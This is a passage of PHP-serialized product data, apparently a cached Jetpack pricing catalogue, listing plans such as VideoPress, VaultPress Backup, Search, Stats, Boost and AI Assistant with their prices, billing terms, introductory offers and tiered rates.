17:\"cost_per_interval\";d:59.39999999999999857891452847979962825775146484375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:26:\"jetpack_videopress_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2117;s:12:\"product_name\";s:18:\"Jetpack VideoPress\";s:12:\"product_slug\";s:26:\"jetpack_videopress_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:18:\"jetpack-videopress\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:28:\"jetpack_videopress_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2119;s:12:\"product_name\";s:18:\"Jetpack VideoPress\";s:12:\"product_slug\";s:28:\"jetpack_videopress_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:18:\"jetpack-videopress\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$191.04\";s:21:\"combined_cost_display\";s:7:\"$191.04\";s:4:\"cost\";d:191.039999999999992041921359486877918243408203125;s:18:\"cost_smallest_unit\";i:19104;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:143.039999999999992041921359486877918243408203125;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$7.96\";}s:24:\"jetpack_backup_t0_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2120;s:12:\"product_name\";s:31:\"Jetpack VaultPress Backup (1GB)\";s:12:\"product_slug\";s:24:\"jetpack_backup_t0_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-0\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$35.88\";s:21:\"combined_cost_display\";s:6:\"$35.88\";s:4:\"cost\";d:35.88000000000000255795384873636066913604736328125;s:18:\"cost_smallest_unit\";i:3588;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$2.99\";}s:25:\"jetpack_backup_t0_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2121;s:12:\"product_name\";s:31:\"Jetpack VaultPress Backup (1GB)\";s:12:\"product_slug\";s:25:\"jetpack_backup_t0_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-0\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$2.99\";s:21:\"combined_cost_display\";s:5:\"$2.99\";s:4:\"cost\";d:2.9900000000000002131628207280300557613372802734375;s:18:\"cost_smallest_unit\";i:299;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:27:\"jetpack_backup_t1_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2123;s:12:\"product_name\";s:32:\"Jetpack VaultPress Backup (10GB)\";s:12:\"product_slug\";s:27:\"jetpack_backup_t1_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$191.04\";s:21:\"combined_cost_display\";s:7:\"$191.04\";s:4:\"cost\";d:191.039999999999992041921359486877918243408203125;s:18:\"cost_smallest_unit\";i:19104;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:143.039999999999992041921359486877918243408203125;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$7.96\";}s:19:\"jetpack_search_free\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2130;s:12:\"product_name\";s:19:\"Jetpack Search Free\";s:12:\"product_slug\";s:19:\"jetpack_search_free\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"search\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:19:\"jetpack-search-free\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.00\";s:21:\"combined_cost_display\";s:2:\"$0\";s:4:\"cost\";i:0;s:18:\"cost_smallest_unit\";i:0;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:8:\"one time\";s:22:\"product_term_localized\";s:8:\"one time\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_search_bi_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2131;s:12:\"product_name\";s:14:\"Jetpack Search\";s:12:\"product_slug\";s:24:\"jetpack_search_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-search\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$160.00\";s:21:\"combined_cost_display\";s:4:\"$160\";s:4:\"cost\";i:160;s:18:\"cost_smallest_unit\";i:16000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:1:{i:0;O:8:\"stdClass\":12:{s:13:\"minimum_units\";i:0;s:13:\"maximum_units\";N;s:13:\"minimum_price\";i:0;s:13:\"maximum_price\";i:0;s:28:\"transform_quantity_divide_by\";i:10000;s:24:\"transform_quantity_round\";s:2:\"up\";s:8:\"flat_fee\";i:0;s:12:\"per_unit_fee\";i:16000;s:21:\"minimum_price_display\";s:2:\"$0\";s:29:\"minimum_price_monthly_display\";s:2:\"$0\";s:21:\"maximum_price_display\";N;s:29:\"maximum_price_monthly_display\";N;}}s:25:\"price_tier_usage_quantity\";i:563;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$6.67\";}s:23:\"jetpack_backup_one_time\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2201;s:12:\"product_name\";s:36:\"Jetpack VaultPress Backup (One-time)\";s:12:\"product_slug\";s:23:\"jetpack_backup_one_time\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-backup-one-time\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.99\";s:21:\"combined_cost_display\";s:5:\"$0.99\";s:4:\"cost\";d:0.9899999999999999911182158029987476766109466552734375;s:18:\"cost_smallest_unit\";i:99;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:8:\"one time\";s:22:\"product_term_localized\";s:8:\"one time\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:20:\"jetpack_stats_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2219;s:12:\"product_name\";s:34:\"Jetpack Stats (Commercial license)\";s:12:\"product_slug\";s:20:\"jetpack_stats_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack_stats_monthly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$100.00\";s:21:\"combined_cost_display\";s:4:\"$100\";s:4:\"cost\";i:100;s:18:\"cost_smallest_unit\";i:10000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:6:{i:0;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:0;s:13:\"maximum_units\";i:10000;s:13:\"minimum_price\";i:10000;s:13:\"maximum_price\";i:10000;s:21:\"minimum_price_display\";s:4:\"$100\";s:29:\"minimum_price_monthly_display\";s:5:\"$8.34\";s:21:\"maximum_price_display\";s:4:\"$100\";s:29:\"maximum_price_monthly_display\";s:5:\"$8.34\";}i:1;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:10001;s:13:\"maximum_units\";i:100000;s:13:\"minimum_price\";i:20000;s:13:\"maximum_price\";i:20000;s:21:\"minimum_price_display\";s:4:\"$200\";s:29:\"minimum_price_monthly_display\";s:6:\"$16.67\";s:21:\"maximum_price_display\";s:4:\"$200\";s:29:\"maximum_price_monthly_display\";s:6:\"$16.67\";}i:2;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:100001;s:13:\"maximum_units\";i:250000;s:13:\"minimum_price\";i:30000;s:13:\"maximum_price\";i:30000;s:21:\"minimum_price_display\";s:4:\"$300\";s:29:\"minimum_price_monthly_display\";s:3:\"$25\";s:21:\"maximum_price_display\";s:4:\"$300\";s:29:\"maximum_price_monthly_display\";s:3:\"$25\";}i:3;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:250001;s:13:\"maximum_units\";i:500000;s:13:\"minimum_price\";i:50000;s:13:\"maximum_price\";i:50000;s:21:\"minimum_price_display\";s:4:\"$500\";s:29:\"minimum_price_monthly_display\";s:6:\"$41.67\";s:21:\"maximum_price_display\";s:4:\"$500\";s:29:\"maximum_price_monthly_display\";s:6:\"$41.67\";}i:4;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:500001;s:13:\"maximum_units\";i:1000000;s:13:\"minimum_price\";i:70000;s:13:\"maximum_price\";i:70000;s:21:\"minimum_price_display\";s:4:\"$700\";s:29:\"minimum_price_monthly_display\";s:6:\"$58.34\";s:21:\"maximum_price_display\";s:4:\"$700\";s:29:\"maximum_price_monthly_display\";s:6:\"$58.34\";}i:5;O:8:\"stdClass\":12:{s:13:\"minimum_units\";i:1000001;s:13:\"maximum_units\";N;s:13:\"minimum_price\";i:95000;s:13:\"maximum_price\";i:0;s:28:\"transform_quantity_divide_by\";i:1000000;s:24:\"transform_quantity_round\";s:2:\"up\";s:8:\"flat_fee\";i:45000;s:12:\"per_unit_fee\";i:25000;s:21:\"minimum_price_display\";s:4:\"$950\";s:29:\"minimum_price_monthly_display\";s:6:\"$79.17\";s:21:\"maximum_price_display\";N;s:29:\"maximum_price_monthly_display\";N;}}s:25:\"price_tier_usage_quantity\";i:10000;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$8.33\";}s:21:\"jetpack_stats_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2220;s:12:\"product_name\";s:34:\"Jetpack Stats (Commercial license)\";s:12:\"product_slug\";s:21:\"jetpack_stats_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack_stats_monthly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$12.95\";s:21:\"combined_cost_display\";s:6:\"$12.95\";s:4:\"cost\";d:12.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1295;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:6:{i:0;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:0;s:13:\"maximum_units\";i:10000;s:13:\"minimum_price\";i:1295;s:13:\"maximum_price\";i:1295;s:21:\"minimum_price_display\";s:6:\"$12.95\";s:29:\"minimum_price_monthly_display\";s:6:\"$12.95\";s:21:\"maximum_price_display\";s:6:\"$12.95\";s:29:\"maximum_price_monthly_display\";s:6:\"$12.95\";}i:1;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:10001;s:13:\"maximum_units\";i:100000;s:13:\"minimum_price\";i:2595;s:13:\"maximum_price\";i:2595;s:21:\"minimum_price_display\";s:6:\"$25.95\";s:29:\"minimum_price_monthly_display\";s:6:\"$25.95\";s:21:\"maximum_price_display\";s:6:\"$25.95\";s:29:\"maximum_price_monthly_display\";s:6:\"$25.95\";}i:2;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:100001;s:13:\"maximum_units\";i:250000;s:13:\"minimum_price\";i:3795;s:13:\"maximum_price\";i:3795;s:21:\"minimum_price_display\";s:6:\"$37.95\";s:29:\"minimum_price_monthly_display\";s:6:\"$37.95\";s:21:\"maximum_price_display\";s:6:\"$37.95\";s:29:\"maximum_price_monthly_display\";s:6:\"$37.95\";}i:3;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:250001;s:13:\"maximum_units\";i:500000;s:13:\"minimum_price\";i:6295;s:13:\"maximum_price\";i:6295;s:21:\"minimum_price_display\";s:6:\"$62.95\";s:29:\"minimum_price_monthly_display\";s:6:\"$62.95\";s:21:\"maximum_price_display\";s:6:\"$62.95\";s:29:\"maximum_price_monthly_display\";s:6:\"$62.95\";}i:4;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:500001;s:13:\"maximum_units\";i:1000000;s:13:\"minimum_price\";i:8795;s:13:\"maximum_price\";i:8795;s:21:\"minimum_price_display\";s:6:\"$87.95\";s:29:\"minimum_price_monthly_display\";s:6:\"$87.95\";s:21:\"maximum_price_display\";s:6:\"$87.95\";s:29:\"maximum_price_monthly_display\";s:6:\"$87.95\";}i:5;O:8:\"stdClass\":12:{s:13:\"minimum_units\";i:1000001;s:13:\"maximum_units\";N;s:13:\"minimum_price\";i:11990;s:13:\"maximum_price\";i:0;s:28:\"transform_quantity_divide_by\";i:1000000;s:24:\"transform_quantity_round\";s:2:\"up\";s:8:\"flat_fee\";i:5600;s:12:\"per_unit_fee\";i:3195;s:21:\"minimum_price_display\";s:7:\"$119.90\";s:29:\"minimum_price_monthly_display\";s:7:\"$119.90\";s:21:\"maximum_price_display\";N;s:29:\"maximum_price_monthly_display\";N;}}s:25:\"price_tier_usage_quantity\";i:10000;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:25:\"jetpack_stats_free_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2221;s:12:\"product_name\";s:43:\"Jetpack Stats (Free non-commercial license)\";s:12:\"product_slug\";s:25:\"jetpack_stats_free_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:25:\"jetpack_stats_free_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.00\";s:21:\"combined_cost_display\";s:2:\"$0\";s:4:\"cost\";i:0;s:18:\"cost_smallest_unit\";i:0;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:2:\"$0\";}s:25:\"jetpack_stats_pwyw_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2222;s:12:\"product_name\";s:20:\"Jetpack Stats (Paid)\";s:12:\"product_slug\";s:25:\"jetpack_stats_pwyw_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:25:\"jetpack_stats_pwyw_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.00\";s:21:\"combined_cost_display\";s:2:\"$0\";s:4:\"cost\";i:0;s:18:\"cost_smallest_unit\";i:0;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";i:0;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:2:\"$0\";}s:23:\"jetpack_stats_bi_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2223;s:12:\"product_name\";s:34:\"Jetpack Stats (Commercial license)\";s:12:\"product_slug\";s:23:\"jetpack_stats_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack_stats_monthly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$160.00\";s:21:\"combined_cost_display\";s:4:\"$160\";s:4:\"cost\";i:160;s:18:\"cost_smallest_unit\";i:16000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:6:{i:0;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:0;s:13:\"maximum_units\";i:10000;s:13:\"minimum_price\";i:16000;s:13:\"maximum_price\";i:16000;s:21:\"minimum_price_display\";s:4:\"$160\";s:29:\"minimum_price_monthly_display\";s:6:\"$13.34\";s:21:\"maximum_price_display\";s:4:\"$160\";s:29:\"maximum_price_monthly_display\";s:6:\"$13.34\";}i:1;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:10001;s:13:\"maximum_units\";i:100000;s:13:\"minimum_price\";i:32000;s:13:\"maximum_price\";i:32000;s:21:\"minimum_price_display\";s:4:\"$320\";s:29:\"minimum_price_monthly_display\";s:6:\"$26.67\";s:21:\"maximum_price_display\";s:4:\"$320\";s:29:\"maximum_price_monthly_display\";s:6:\"$26.67\";}i:2;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:100001;s:13:\"maximum_units\";i:250000;s:13:\"minimum_price\";i:48000;s:13:\"maximum_price\";i:48000;s:21:\"minimum_price_display\";s:4:\"$480\";s:29:\"minimum_price_monthly_display\";s:3:\"$40\";s:21:\"maximum_price_display\";s:4:\"$480\";s:29:\"maximum_price_monthly_display\";s:3:\"$40\";}i:3;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:250001;s:13:\"maximum_units\";i:500000;s:13:\"minimum_price\";i:80000;s:13:\"maximum_price\";i:80000;s:21:\"minimum_price_display\";s:4:\"$800\";s:29:\"minimum_price_monthly_display\";s:6:\"$66.67\";s:21:\"maximum_price_display\";s:4:\"$800\";s:29:\"maximum_price_monthly_display\";s:6:\"$66.67\";}i:4;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:500001;s:13:\"maximum_units\";i:1000000;s:13:\"minimum_price\";i:112000;s:13:\"maximum_price\";i:112000;s:21:\"minimum_price_display\";s:6:\"$1,120\";s:29:\"minimum_price_monthly_display\";s:6:\"$93.34\";s:21:\"maximum_price_display\";s:6:\"$1,120\";s:29:\"maximum_price_monthly_display\";s:6:\"$93.34\";}i:5;O:8:\"stdClass\":12:{s:13:\"minimum_units\";i:1000001;s:13:\"maximum_units\";N;s:13:\"minimum_price\";i:152000;s:13:\"maximum_price\";i:0;s:28:\"transform_quantity_divide_by\";i:1000000;s:24:\"transform_quantity_round\";s:2:\"up\";s:8:\"flat_fee\";i:72000;s:12:\"per_unit_fee\";i:40000;s:21:\"minimum_price_display\";s:6:\"$1,520\";s:29:\"minimum_price_monthly_display\";s:7:\"$126.67\";s:21:\"maximum_price_display\";N;s:29:\"maximum_price_monthly_display\";N;}}s:25:\"price_tier_usage_quantity\";i:10000;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$6.67\";}s:23:\"jetpack_monitor_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2241;s:12:\"product_name\";s:15:\"Jetpack Monitor\";s:12:\"product_slug\";s:23:\"jetpack_monitor_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:15:\"jetpack-monitor\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$1.22\";s:21:\"combined_cost_display\";s:5:\"$1.22\";s:4:\"cost\";d:1.2199999999999999733546474089962430298328399658203125;s:18:\"cost_smallest_unit\";i:122;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:22:\"jetpack_monitor_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2242;s:12:\"product_name\";s:15:\"Jetpack Monitor\";s:12:\"product_slug\";s:22:\"jetpack_monitor_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:15:\"jetpack-monitor\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.64\";s:21:\"combined_cost_display\";s:6:\"$14.64\";s:4:\"cost\";d:14.6400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:1464;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$1.22\";}s:21:\"jetpack_boost_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2400;s:12:\"product_name\";s:13:\"Jetpack Boost\";s:12:\"product_slug\";s:21:\"jetpack_boost_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:13:\"jetpack-boost\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.95\";s:21:\"combined_cost_display\";s:6:\"$29.95\";s:4:\"cost\";d:29.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:2995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:20:\"jetpack_boost_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2401;s:12:\"product_name\";s:13:\"Jetpack Boost\";s:12:\"product_slug\";s:20:\"jetpack_boost_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:13:\"jetpack-boost\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$239.40\";s:21:\"combined_cost_display\";s:7:\"$239.40\";s:4:\"cost\";d:239.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:23940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:119.400000000000005684341886080801486968994140625;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$19.95\";}s:18:\"jetpack_ai_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2450;s:12:\"product_name\";s:20:\"Jetpack AI Assistant\";s:12:\"product_slug\";s:18:\"jetpack_ai_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:10:\"jetpack-ai\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:17:\"jetpack_ai_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2451;s:12:\"product_name\";s:20:\"Jetpack AI Assistant\";s:12:\"product_slug\";s:17:\"jetpack_ai_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:10:\"jetpack-ai\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:59.39999999999999857891452847979962825775146484375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:20:\"jetpack_ai_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2452;s:12:\"product_name\";s:20:\"Jetpack AI Assistant\";s:12:\"product_slug\";s:20:\"jetpack_ai_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:10:\"jetpack-ai\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$191.04\";s:21:\"combined_cost_display\";s:7:\"$191.04\";s:4:\"cost\";d:191.039999999999992041921359486877918243408203125;s:18:\"cost_smallest_unit\";i:19104;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:143.039999999999992041921359486877918243408203125;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$7.96\";}s:22:\"jetpack_social_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2500;s:12:\"product_name\";s:20:\"Jetpack Social 